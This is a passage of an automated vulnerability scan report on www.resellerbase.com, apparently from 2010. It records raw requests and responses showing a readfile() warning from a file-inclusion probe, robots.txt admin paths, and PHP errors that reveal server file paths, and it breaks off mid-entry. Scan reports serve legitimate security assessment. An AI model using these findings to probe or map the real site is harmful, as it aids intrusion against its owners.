X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 1151
Connection: close
Content-Type: image/gif

<br />
<b>Warning</b>: readfile(themes/kosmos/images/pr///www.google.com/terms_of_service.html). In your email, please send us the &lt;b&gt;entire&lt;/b&gt; code displayed below. Please also send us
...[SNIP]...
e. My Internet access is through a dial-up account I have with the FooCorp ISP.&quot; or &quot;I'm using the Konqueror browser on Linux to search from my job at myFoo.com. My machine's IP address is 10.20.30.40, but all of myFoo's web traffic goes through some kind of proxy server whose IP address is 10.11.12.13.&quot; (If you don't know any information like this, that's OK. But this kind of information ca
...[SNIP]...

9. Robots.txt file

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /robots.txt

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:28 GMT
Server: Apache/2
Last-Modified: Thu, 28 Feb 2008 13:48:28 GMT
ETag: "ab81767-155-447382d254300"
Accept-Ranges: bytes
Content-Length: 341
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /admin/
Disallow: /cp/
Disallow: /add.php
Disallow: /modify.php
Disallow: /upgrade.php
Disallow: /tell_friend.php
Disallow: /send_pwd.php
Disallow: /sendmai
...[SNIP]...

10. HTML does not specify charset
There are 44 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


10.1. http://www.resellerbase.com/add.php/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /add.php/

Request

GET /add.php/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:16:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...

10.2. http://www.resellerbase.com/adult/media-chat/more2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/more2.html

Request

GET /adult/media-chat/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:30:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.3. http://www.resellerbase.com/adult/more2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/more2.html

Request

GET /adult/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:33:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to undefined method stdClass::RecordCount() in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/link.class.php</b> on line <b>0</b><br />

10.4. http://www.resellerbase.com/blocks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /blocks/

Request

GET /blocks/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 403 Forbidden
Date: Wed, 17 Nov 2010 23:01:37 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 483

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /blocks/ on this server.
<HR>
<I>www.r
...[SNIP]...

10.5. http://www.resellerbase.com/cgi-bin/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /cgi-bin/

Request

GET /cgi-bin/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Nov 2010 01:16:48 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 484

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /cgi-bin/ on this server.
<HR>
<I>www.
...[SNIP]...

10.6. http://www.resellerbase.com/goods-wholesale/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/search.php

Request

GET /goods-wholesale/search.php?cat=4&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:41:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.7. http://www.resellerbase.com/other/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /other/search.php

Request

GET /other/search.php?cat=6&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:51:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.8. http://www.resellerbase.com/resources-information/ebooks/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/search.php

Request

GET /resources-information/ebooks/search.php?cat=9&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.9. http://www.resellerbase.com/resources-information/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/search.php

Request

GET /resources-information/search.php?cat=10&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:51:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.10. http://www.resellerbase.com/tag/Outsource+SEO

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/Outsource+SEO

Request

GET /tag/Outsource+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.11. http://www.resellerbase.com/tag/Reseller+SEO

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/Reseller+SEO

Request

GET /tag/Reseller+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.12. http://www.resellerbase.com/tag/Resellers+SEO

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/Resellers+SEO

Request

GET /tag/Resellers+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.13. http://www.resellerbase.com/tag/SEO+Reseller

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/SEO+Reseller

Request

GET /tag/SEO+Reseller HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.14. http://www.resellerbase.com/tag/SEO+Resellers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/SEO+Resellers

Request

GET /tag/SEO+Resellers HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.15. http://www.resellerbase.com/tag/SEO+outsourcing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/SEO+outsourcing

Request

GET /tag/SEO+outsourcing HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.16. http://www.resellerbase.com/tag/SEO+reseller+program

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/SEO+reseller+program

Request

GET /tag/SEO+reseller+program HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.17. http://www.resellerbase.com/tag/White+Label+SEO

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/White+Label+SEO

Request

GET /tag/White+Label+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.18. http://www.resellerbase.com/tag/downtime+monitor

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/downtime+monitor

Request

GET /tag/downtime+monitor HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.19. http://www.resellerbase.com/tag/dripship

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dripship

Request

GET /tag/dripship HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.20. http://www.resellerbase.com/tag/dropshipping

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dropshipping

Request

GET /tag/dropshipping HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.21. http://www.resellerbase.com/tag/email+fax

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/email+fax

Request

GET /tag/email+fax HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.22. http://www.resellerbase.com/tag/nude

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/nude

Request

GET /tag/nude HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.23. http://www.resellerbase.com/tag/outsource

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/outsource

Request

GET /tag/outsource HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.24. http://www.resellerbase.com/tag/reseller

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/reseller

Request

GET /tag/reseller HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.25. http://www.resellerbase.com/tag/search+engine+optimisation

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search+engine+optimisation

Request

GET /tag/search+engine+optimisation HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.26. http://www.resellerbase.com/tag/search+engine+optimization

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search+engine+optimization

Request

GET /tag/search+engine+optimization HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.27. http://www.resellerbase.com/tag/search+engine+submission

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/search+engine+submission

Request

GET /tag/search+engine+submission HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

10.28. http://www.resellerbase.com/tag/seo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/seo

Request

GET /tag/seo HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
